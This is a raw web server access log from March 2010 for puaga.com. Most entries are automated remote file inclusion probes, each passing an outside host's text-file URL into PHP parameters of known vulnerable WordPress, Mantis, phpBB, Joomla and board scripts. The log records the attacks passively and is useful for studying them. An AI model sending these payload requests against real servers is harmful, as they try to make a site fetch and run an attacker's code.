78.46.87.243 - - [04/Mar/2010:07:09:52 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:07:09:52 -0800] "GET /logs/access_100213.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:07:10:06 -0800] "GET /write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:07:10:07 -0800] "GET /logs/write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:10:08 -0800] "GET /logs/access_100206.log/write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:07:10:08 -0800] "GET /logs/access_100206.log/write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:07:10:09 -0800] "GET /logs/access_100203.log/write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:07:10:11 -0800] "GET /logs/access_100206.log/write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.205.96.13 - - [04/Mar/2010:07:10:22 -0800] "GET / HTTP/1.0" 200 3626 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.puaga.com"
91.205.96.13 - - [04/Mar/2010:07:10:22 -0800] "GET / HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "puaga.com"
91.205.96.13 - - [04/Mar/2010:07:10:22 -0800] "GET / HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.puaga.com"
91.205.96.13 - - [04/Mar/2010:07:10:23 -0800] "GET / HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "puaga.com"
189.108.236.148 - - [04/Mar/2010:07:10:36 -0800] "GET /logs/access_100214.log%20%20//bbs/write_comment_update.php?board_skin_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:07:10:38 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:07:10:38 -0800] "GET /?path%5Bdocroot%5D=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:07:10:39 -0800] "GET /logs/access_100224.log%20%20//?path%5Bdocroot%5D=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [04/Mar/2010:07:10:42 -0800] "GET /logs/access_100202.log///////delete_comment.php?board_skin_path=http://canaldoserralheiro.com.br/laknat/lkt.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:11:08 -0800] "GET /logs/access_100218.log%20%20/become_editor.php?theme_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:11:08 -0800] "GET /logs/become_editor.php?theme_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:07:11:14 -0800] "GET /write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:07:11:14 -0800] "GET /logs/write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:07:11:14 -0800] "GET /logs/access_100203.log/write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:11:23 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:07:11:39 -0800] "GET /logs/access_100206.log/write_update.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:12:08 -0800] "GET /logs/access_100210.log///bbs/write_comment_update.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [04/Mar/2010:07:12:11 -0800] "GET /logs/access_100215.log/includes/functions_admin.php?phpbb_root_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:12:26 -0800] "GET /logs/become_editor.php?theme_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:12:27 -0800] "GET /become_editor.php?theme_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.158.231.168 - - [04/Mar/2010:07:12:27 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://cealianca.org.br/administrator/components/a??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.puaga.com"
202.158.231.168 - - [04/Mar/2010:07:12:27 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://cealianca.org.br/administrator/components/a??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:12:30 -0800] "GET /logs/access_100218.log%20%20/become_editor.php?theme_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:12:32 -0800] "GET /become_editor.php?theme_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:12:32 -0800] "GET /logs/become_editor.php?theme_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:12:36 -0800] "GET /logs/access_100218.log%20%20/become_editor.php?theme_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:07:12:41 -0800] "GET /logs/access_100213.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:07:12:44 -0800] "GET /logs/access_100213.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:12:47 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:07:13:29 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:13:34 -0800] "GET /logs/access_100218.log%20%20/become_editor.php?theme_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:13:34 -0800] "GET /logs/become_editor.php?theme_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:13:36 -0800] "GET /become_editor.php?theme_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:13:38 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:14:14 -0800] "GET /logs/access_100218.log%20%20/become_editor.php?theme_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:14:15 -0800] "GET /logs/become_editor.php?theme_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:14:45 -0800] "GET /logs/access_100224.log%20%20//?path%5Bdocroot%5D=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:14:48 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
66.7.222.43 - - [04/Mar/2010:07:15:29 -0800] "GET ///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.puaga.com"
66.7.222.43 - - [04/Mar/2010:07:15:29 -0800] "GET /logs////index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:16:28 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:16:29 -0800] "GET /logs/access_100224.log%20%20//?path%5Bdocroot%5D=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:16:32 -0800] "GET /?path%5Bdocroot%5D=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [04/Mar/2010:07:16:47 -0800] "GET /logs/access_100211.log//bbs/write_comment_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [04/Mar/2010:07:16:48 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
58.230.162.220 - - [04/Mar/2010:07:17:09 -0800] "GET /mantis/login_page.php?g_meta_include_file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [04/Mar/2010:07:17:09 -0800] "GET /logs/access_100215.log%20%20/mantis/login_page.php?g_meta_include_file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [04/Mar/2010:07:17:09 -0800] "GET /logs/mantis/login_page.php?g_meta_include_file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:07:17:15 -0800] "GET /logs/access_100129.log%20%20//?path%5Bdocroot%5D=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:17:39 -0800] "GET /logs/access_100212.log%20%20/mantis/login_page.php?g_meta_include_file=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:17:39 -0800] "GET /logs/mantis/login_page.php?g_meta_include_file=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:17:39 -0800] "GET /mantis/login_page.php?g_meta_include_file=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [04/Mar/2010:07:17:41 -0800] "GET /mantis/login_page.php?g_meta_include_file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [04/Mar/2010:07:17:41 -0800] "GET /logs/access_100215.log%20%20/mantis/login_page.php?g_meta_include_file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [04/Mar/2010:07:17:41 -0800] "GET /logs/mantis/login_page.php?g_meta_include_file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:17:51 -0800] "GET /logs/access_100215.log%20%20/mantis/login_page.php?g_meta_include_file=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [04/Mar/2010:07:18:09 -0800] "GET /logs/access_100212.log%20%20/mantis/login_page.php?g_meta_include_file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:18:18 -0800] "GET /logs/access_100226.log%20%20///include/admin.lib.inc.php?site_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [04/Mar/2010:07:18:29 -0800] "GET /logs/access_100212.log%20%20/mantis/login_page.php?g_meta_include_file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:07:18:42 -0800] "GET /logs/access_100129.log%20%20//?path%5Bdocroot%5D=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:07:19:25 -0800] "GET /logs/access_100201.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:19:33 -0800] "GET /bbs//skin/ggambo6200_board/error.php?dir=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:19:33 -0800] "GET /logs/access_100217.log//bbs//skin/ggambo6200_board/error.php?dir=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:19:33 -0800] "GET /logs//bbs//skin/ggambo6200_board/error.php?dir=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:20:02 -0800] "GET /logs/access_100226.log%20%20//bbs//skin/ggambo6200_board/error.php?dir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:20:02 -0800] "GET /logs//bbs//skin/ggambo6200_board/error.php?dir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:20:02 -0800] "GET /bbs//skin/ggambo6200_board/error.php?dir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:20:02 -0800] "GET /logs//bbs//skin/ggambo6200_board/error.php?dir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:20:02 -0800] "GET /logs/access_100226.log%20%20//bbs//skin/ggambo6200_board/error.php?dir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:20:02 -0800] "GET /bbs//skin/ggambo6200_board/error.php?dir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:20:20 -0800] "GET /bbs//skin/ggambo6200_board/error.php?dir=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:20:20 -0800] "GET /logs/access_100217.log//bbs//skin/ggambo6200_board/error.php?dir=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:20:20 -0800] "GET /logs//bbs//skin/ggambo6200_board/error.php?dir=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:21:04 -0800] "GET /board.php?code=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:21:05 -0800] "GET /logs/access.log%20%20//board.php?code=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:21:05 -0800] "GET /logs/access_100203.log%20%20//board.php?code=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [04/Mar/2010:07:21:49 -0800] "GET /logs/access_100214.log//bbs/write_comment_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:21:54 -0800] "GET /logs/access_100218.log/become_editor.php?theme_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:21:55 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:22:02 -0800] "GET /logs/access_100217.log%20%20//bbs//skin/ggambo6200_board/error.php?dir=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:22:09 -0800] "GET /logs/access_100130.log%20%20/?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:22:09 -0800] "GET /logs/?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:22:10 -0800] "GET /?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:07:22:11 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:07:22:11 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:07:22:11 -0800] "GET /logs/access_100128.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:07:22:14 -0800] "GET /logs/access_100201.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:22:17 -0800] "GET /logs/access_100129.log%20%20//?path%5Bdocroot%5D=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:22:26 -0800] "GET /logs/access_100206.log%20%20/?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [04/Mar/2010:07:22:30 -0800] "GET /logs////admin/index.php?vagina=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [04/Mar/2010:07:22:30 -0800] "GET ///admin/index.php?vagina=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [04/Mar/2010:07:22:30 -0800] "GET /logs/access_100212.log%20%20////admin/index.php?vagina=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [04/Mar/2010:07:22:45 -0800] "GET /write_update.php?board_skin_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [04/Mar/2010:07:22:45 -0800] "GET /logs//write_update.php?board_skin_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [04/Mar/2010:07:22:45 -0800] "GET /logs/access_100206.log%20%20//write_update.php?board_skin_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [04/Mar/2010:07:22:50 -0800] "GET /logs/access_100126.log%20%20//write_update.php?board_skin_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:23:24 -0800] "GET /logs/access_100226.log//bbs//skin/ggambo6200_board/error.php?dir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [04/Mar/2010:07:24:22 -0800] "GET /logs/access_100212.log////admin/index.php?vagina=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:24:23 -0800] "GET /logs/index2.php?ascii_seite=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:24:23 -0800] "GET /logs/access_100206.log%20%20/index2.php?ascii_seite=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:24:23 -0800] "GET /logs/access_100130.log%20%20/index2.php?ascii_seite=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:07:24:24 -0800] "GET /index2.php?ascii_seite=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 200 2875 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:24:38 -0800] "GET /logs/access_100208.log%20%20//bbs//skin/ggambo6200_board/error.php?dir=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:24:45 -0800] "GET /logs/access_100226.log//bbs//skin/ggambo6200_board/error.php?dir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:24:50 -0800] "GET /logs/access_100129.log%20%20//?path%5Bdocroot%5D=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:07:24:52 -0800] "GET /logs/access_100217.log%20%20//bbs//skin/ggambo6200_board/error.php?dir=http://www.formationalliance.com/images/id1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:25:22 -0800] "GET /logs/access_100218.log/become_editor.php?theme_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:07:25:26 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:25:26 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:25:27 -0800] "GET /logs/access_100218.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:25:27 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:07:25:36 -0800] "GET /logs/access_100129.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
